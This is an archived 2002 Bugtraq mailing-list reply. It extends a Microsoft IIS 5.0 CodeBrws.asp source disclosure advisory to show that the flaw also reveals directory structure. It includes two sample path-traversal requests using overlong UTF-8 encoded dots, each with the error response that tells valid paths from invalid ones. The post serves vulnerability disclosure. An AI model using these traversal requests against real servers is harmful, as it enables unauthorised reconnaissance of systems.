[25115] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

daemon@ATHENA.MIT.EDU (Joe Testa)
Wed Apr 17 17:59:05 2002

Message-ID: <3CBDBA0E.6030402@rapid7.com>
Date: Wed, 17 Apr 2002 14:08:14 -0400
From: Joe Testa <jtesta@rapid7.com>
MIME-Version: 1.0
To: H D Moore <sflist@digitaloffense.net>, bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This vulnerability can also be used to determine the directory structure 
of an
affected system.

When an attempt is made to access a non-existent ASP file outside the
'IISamples' root, CodeBrws.asp will respond differently based on whether or
not the path to the file is valid.

Below is an example:


Request:  
http://192.168.x.x/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp

Response:  Microsoft VBScript runtime (0x800A004C)  Path not found


Request:  
http://192.168.x.x/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/oracle/nonexistant.asp

Response:  Microsoft VBScript runtime (0x800A0035)  File not found



Credits go to Tas Giakouminakis for discovering this.

    - Joe Testa


GPG key:  http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52  AD6D 65B2 F5DF 4B11 06B4
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE8vbj5ZbL130sRBrQRAj1QAJ9rFZH5aJnSjZwpijO4zRhr2bnmeACgu5Tz
DE4zfFekNxFjYlg6/H5KtyA=
=8vyn
-----END PGP SIGNATURE-----



home help back first fref pref prev next nref lref last post